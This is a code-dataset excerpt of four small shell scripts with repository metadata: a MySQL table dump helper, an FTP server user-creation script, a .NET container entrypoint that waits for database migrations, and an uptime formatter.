4bd4486f1590c133c59e570544711d753ac2ccf7 | Shell | zwrawr/ludumdare | /sandbox/scripts/db/table-dump | UTF-8 | 911 | 4.25 | 4 | [
"MIT"
] | permissive | #!/bin/sh
# Dump one database table as SQL via mysqldump, appending statements that
# record the table's version in the cmw_config table (except when dumping
# cmw_config itself).  Extra arguments are passed through to mysqldump.
if [ $# -lt 1 ]; then
	>&2 echo "Usage: $0 table_name [additional arguments for mysqldump] > table_name.sql"
	exit 1
fi
COMMAND=$0
COMMAND_PATH=`pwd -P`
FULL_ARGS=$@
TABLE=$1
shift
ARGS=$@
# Sibling helper scripts resolve the database name and table version.
DB=`$COMMAND_PATH/database-get`
if [ $? -ne 0 ]; then
	>&2 echo "Error: Unable to fetch database name"
	exit 1
fi
TABLE_VERSION=`$COMMAND_PATH/config-get-value $TABLE`
if [ $? -ne 0 ]; then
	>&2 echo "Error: Unable to fetch table version from config"
	exit 1
fi
# Everything below goes to stdout so the caller can redirect it to a file.
echo "-- $COMMAND -- Starship table dump script"
echo "-- Options: $FULL_ARGS"
echo
mysqldump $DB $TABLE $ARGS
# Only add commands for setting the version if NOT the config table
if [ "$TABLE" != "cmw_config" ]; then
	echo
	echo "-- Set the table version inside the config"
	echo "LOCK TABLES \`cmw_config\` WRITE;"
	echo "INSERT INTO \`cmw_config\` (\`key\`,\`value\`) VALUES ('$TABLE','$TABLE_VERSION');"
	echo "UNLOCK TABLES;"
fi
exit 0
| true |
cc5614461af90cc62bc4c24a8310c920cbfd88aa | Shell | nklapste/deadSFS | /server/add_user.sh | UTF-8 | 521 | 3.640625 | 4 | [
"MIT"
] | permissive | #!/usr/bin/env bash
# Add a new user to the deadSFS FTP server
# Usage: add_user.sh <username> <groupname>   (must run as root)
# Creates the group and user, prompts interactively for the password,
# then provisions a 750 home directory under the FTP tree.
NEW_USER=$1
NEW_USER_GROUP=$2
groupadd ${NEW_USER_GROUP}
useradd ${NEW_USER}
# passwd prompts on the terminal for the new user's password.
passwd ${NEW_USER}
usermod -a -G ${NEW_USER_GROUP} ${NEW_USER}
FTP_HOME="/var/ftp/ece_422_security_project/home"
usermod -d ${FTP_HOME} ${NEW_USER}
NEW_USER_HOME="${FTP_HOME}/${NEW_USER}"
mkdir ${NEW_USER_HOME}
chown ${NEW_USER}:${NEW_USER_GROUP} ${NEW_USER_HOME}
# 750: owner full access, group read/execute, others none.
chmod 750 ${NEW_USER_HOME}
echo "Added new user: ${NEW_USER} with group: ${NEW_USER_GROUP} to the ftp server"
| true |
b8c691c07ad0fd78970007c290ab38b44416f5d9 | Shell | sfjadi2010/HealthCatalystTask | /Server/entrypoint.sh | UTF-8 | 244 | 2.71875 | 3 | [] | no_license | #!/bin/bash
# Container entrypoint: restore packages, wait for the database to accept
# EF Core migrations, then hand off to the watch/run command below.
set -e
run_cmd="dotnet watch -p PersonSearch run"
dotnet restore
# Retry the migration every second until the database is reachable.
until dotnet ef -s PersonSearch -p PersonSearch database update; do
>&2 echo "DB is starting up"
sleep 1
done
>&2 echo "DB is up - executing command"
exec $run_cmd | true |
3a6683ff0133a5a0d4ff85ad237f2a30bb970fac | Shell | Backup-Gits/0019-scripts | /build/4.0.0/pkg/script/script.pkg.d/script/getuptime | UTF-8 | 460 | 3.21875 | 3 | [] | no_license | #!/bin/bash
#set -x
# Parse `uptime` output into days / hours / minutes of system uptime and
# print "<D> Day <H> Hour <M> Min".
# NOTE(review): this depends on the exact field layout of uptime's output
# ("... up N days, HH:MM," vs "... up HH:MM," vs "... up NN min,") —
# verify against the target system's uptime implementation.
days=`uptime|grep day`
if [ "$days" != "" ];then
# Uptime >= 1 day: field 3 is the day count, field 5 the time part.
days=`uptime|awk '{print $3}'|sed s/,//g`
time=`uptime|awk '{print $5}'|sed s/,//g`
else
days="0"
time=`uptime|awk '{print $3}'|sed s/,//g`
fi
# A ':' means the time part is HH:MM; otherwise it is bare minutes.
min=`echo $time|grep ':'`
if [ "$min" != "" ];then
hour=`echo $time|awk -F":" '{print $1}'`
min=`echo $time|awk -F":" '{print $2}'`
else
hour="0"
min=`echo $time`
fi
echo "$days Day $hour Hour $min Min"
#echo $time
| true |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.